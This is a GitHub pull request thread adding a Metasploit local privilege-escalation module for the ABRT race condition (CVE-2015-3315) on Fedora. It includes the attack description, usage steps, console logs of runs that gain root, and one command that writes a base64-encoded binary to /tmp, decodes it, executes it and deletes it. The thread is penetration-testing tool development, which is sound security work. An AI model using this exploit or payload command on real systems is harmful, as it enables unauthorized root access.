Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ABRT raceabrt Privilege Escalation module #9422

Merged
merged 5 commits into from Feb 11, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jan 16, 2018

Add ABRT raceabrt Privilege Escalation module.

    This module attempts to gain root privileges on Fedora systems with
    a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
    as the crash handler.

    A race condition allows local users to change ownership of arbitrary
    files (CVE-2015-3315). This module uses a symlink attack on
    '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
    then adds a new user with UID=0 GID=0 to gain root privileges.
    Winning the race could take a few minutes.

    This module has been tested successfully on ABRT packaged version
    2.2.1-1.fc19 on Fedora 19 x86_64 and 2.2.2-2.fc20 on Fedora 20 x86_64.
    Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.

Verification

  • Start msfconsole
  • Get a session
  • use use exploit/linux/local/abrt_raceabrt_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/linux/local/abrt_raceabrt_priv_esc 
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
session => 1
msf exploit(linux/local/abrt_raceabrt_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.goXyr' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[+] Success! '/etc/passwd' is writable
[*] Adding MKaocvEj user to /etc/passwd ...
[*] Writing '/tmp/.YcrXQ7SwC' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:38280) at 2018-01-16 09:16:18 -0500
[+] Deleted /tmp/.goXyr
[+] Deleted /tmp/.YcrXQ7SwC

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 17, 2018

awesome. This was the other module on my to do list that i started coding, and never got around to finishing.

Gave the code a once over, things like sane to me!

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 17, 2018

@h00die cool. Yeah, I thought this might be the one you were referring to. The CVE references get a little confusing between this issue and the issues exploited in #9399 .

I have a couple of concerns with this implementation.

Firstly, the use of su - <username> requires an interactive shell.

Second, it doesn't work on Meterpreter sessions. I haven't had time to investigate further, but most likely related to the timeout. cmd_exec does not appear to honor the timeout for whatever reason.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 17, 2018

Blocked on #9429 due to issues with Meterpreter sessions.

@bcoles bcoles added the delayed label Jan 17, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 21, 2018

Delayed pending #9438

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 21, 2018

It looks like there's an issue with using su -u <username> in Meterpreter sessions which does not effect shell sessions.

@bcoles bcoles added delayed and removed delayed labels Jan 24, 2018
end

chown_file = '/etc/passwd'
username = rand_text_alpha rand(7..10)

This comment has been minimized.

Copy link
@h00die

h00die Feb 3, 2018

Contributor

I'd like to see this be a non-required item. During a pentest, it'd be good to set a static name across all exploited systems (like the pentest company name), or whatever a possible agreed upon flag may be. If not given, rand it.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 3, 2018

still need some docs on this, but this will be the next I test since I have some of those Fedoras laying around already

@h00die h00die self-assigned this Feb 3, 2018
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 3, 2018

Fedora 20 worked for me!

msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
session => 1
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/abrt_raceabrt_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*]  The target service is running, but could not be validated.
msf exploit(linux/local/abrt_raceabrt_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.zbUQ4WFUQA' (64240 bytes) ...
[*] Max line length is 65537
[*] Writing 64240 bytes in 4 chunks of 55896 bytes (octal-encoded), using printf
[*] Next chunk is 49542 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 41969 bytes
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-02-20:16:49-18668.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:49-18670.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:49-18672.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18680.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18687.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18691.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18695.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18700.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:17:46-27026.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:17:46-27031.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 ubuntu abrt 1723 Jan 31 21:49 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding orrycKU user to /etc/passwd ...
[*] Switching to new user...
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[*] Writing '/tmp/.Zzjw1Y' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60038) at 2018-02-02 20:26:24 -0500
[+] Deleted /tmp/.zbUQ4WFUQA
[+] Deleted /tmp/.Zzjw1Y

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.workGroup
OS           : Fedora 20 (Linux 3.11.10-301.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 3, 2018

same box but via meterpreter (as you noted):

[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.V3rm7oX' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] (current) UNIX password: 
[-] Exploit aborted due to failure: unknown: Failed to own '/etc/passwd'
[*] Exploit completed, but no session was created.
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 3, 2018

Thanks @h00die

I got side tracked with other PRs and haven't come back to this one.

Regarding the username, I agree with your suggested use case and could easily change it to an Opt.

Unfortunately this module only works with shell sessions and not meterpreter sessions, due to the use of su. Taking a look through the framework I found at least two other instances where this issue occurred, causing developers to code around the framework, which isn't ideal.

Chatting with @busterb suggested implementing "subshell" functionality in meterpreter. This would require a bit of rework and probably won't be implemented any time soon.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 3, 2018

The easiest short term solution would be removing meterpreter as a supported session type. That's lame.

Another approach would be hard coding the payload as a Linux bind/reverse shell, the using su in on_client_connect. That's also lame.

This PR has been on the back-burner, and I've added the delayed tag, until I find a better approach.

sudo is not a viable approach in this instance, as the sudoers ownership is modified to UID != 0. No big loss - I generally prefer not to modify sudoers because reasons.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 3, 2018

@h00die are you using the latest Metasploit / Meterpreter from git? I just noticed the (current) UNIX password: in your output. That was due to bug #9438 in cmd_exec in Linux meterpreter / mettle which has since been fixed.

The exploit still fails on the latest version from git, but fails due to su. Failed exploitation on Meterpreter should look like this:

msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.2.2-2.fc20
[*] Writing '/tmp/.vszljSpKz' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-03-13:23:19-91046.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-03-13:23:19-91048.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-03-13:23:19-91050.new, attempting to race...
[*] 	Didn't win, trying again!

<truncated for brevity>

[*] Detected ccpp-2018-02-03-13:25:24-101100.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 user abrt 2330 Jan 25 00:05 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding ktGKfJm user to /etc/passwd ...
[*] Switching to new user...
uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[-] Exploit aborted due to failure: unknown: Failed to gain root privileges
[*] Exploit completed, but no session was created.
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 3, 2018

Fixed. I'll update shortly.

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                       Connection
  --  ----  ----                   -----------                                                       ----------
  1         shell cmd/unix                                                                           172.16.191.244:1337 -> 172.16.191.137:37848 (172.16.191.137)
  3         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ localhost.localdomain  172.16.191.244:4433 -> 172.16.191.137:50273 (172.16.191.137)

msf5 exploit(multi/handler) > use exploit/linux/local/abrt_raceabrt_priv_esc 
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > set username h00die_waz_here
username => h00die_waz_here
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.gT1bRxQ' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[+] Success! '/etc/passwd' is writable
[*] Adding h00die_waz_here user to /etc/passwd ...
[*] Writing '/tmp/.2laqV' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 4 opened (172.16.191.244:4444 -> 172.16.191.137:38869) at 2018-02-03 02:55:40 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 3, 2018

Both shell and meterpreter sessions are now supported.

I was under the impression that shell_command_token would work for both shell and meterpreter sessions, but apparently that's not the case.

For meterpreter sessions, on_new_session gets called, but none of the shell_command_token commands get executed, so the module doesn't clean up after itself for meterpreter sessions.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 3, 2018

so just waiting on docs and a retest then?

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 3, 2018

@h00die yup. will commit shortly.

Edit: Nevermind. It will have to wait.

@bcoles bcoles added docs and removed delayed needs-docs labels Feb 4, 2018
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 4, 2018

@h00die Done. Should be good to go.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 4, 2018

I dropped a mettle based on the most recent (-dev) build, but it segfault core dumped.

[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgCdWgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/QsBRs.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/EZWoT' < '/tmp/QsBRs.b64' ; chmod +x '/tmp/EZWoT' ; '/tmp/EZWoT' & sleep 2 ; rm -f '/tmp/EZWoT' ; rm -f '/tmp/QsBRs.b64'"
[-] Output: "/bin/sh: line 15: 18364 Segmentation fault      (core dumped) '/tmp/TpWef'"

Possible user error on this one, however I'm pretty OK to land this if anyone else will 2nd that (@busterb @wvu-r7 )

@busterb

This comment has been minimized.

Copy link
Member

busterb commented Feb 5, 2018

I don't think a segfault should ever be user-error other than mine :) Will take a look, thanks!

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 10, 2018

@busterb do you want me to wait for that segfault to then test this on mettle, or just pass it since it works on shell and made it most the way (known issue) on mettle? I think its good to land, but id also hesitate to land it if the mettle gem hasn't been push out yet (so others dont land in this odd situation)

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 11, 2018

Mettle gem has been updated to 0.3.7 in master. It's still 0.3.6 in this branch.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 11, 2018

Is it possible you generated a mettle binary while on a branch with one version of the mettle gem, then used this module on a mettle session while running metasploit from a different branch with a different version of mettle?

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 11, 2018

worked after a rebase.

msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.4TeRYgl' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-11-11:27:39-20254.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:39-20256.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:51-21725.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:51-21730.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 ragecyr abrt 1723 Jan 31 21:49 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding iFXRgyYR user to /etc/passwd ...
[*] Writing '/tmp/.PiopYAJ5' (207 bytes) ...
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:55515) at 2018-02-11 11:27:54 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localGroup
OS           : Fedora 20 (Linux 3.11.10-301.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@h00die h00die merged commit 6968172 into rapid7:master Feb 11, 2018
1 check passed
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Details
h00die added a commit that referenced this pull request Feb 11, 2018
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 11, 2018

Release Notes

The exploits/linux/local/abrt_raceabrt_priv_esc module has been added to the framework. On Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler, a race condition allows local users to change ownership of arbitrary files. This module enables you to take ownership of the /etc/passwd file and gain root privileges.

@bcoles bcoles deleted the bcoles:abrt_raceabrt_priv_esc branch Feb 11, 2018
jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

4 participants
You can’t perform that action at this time.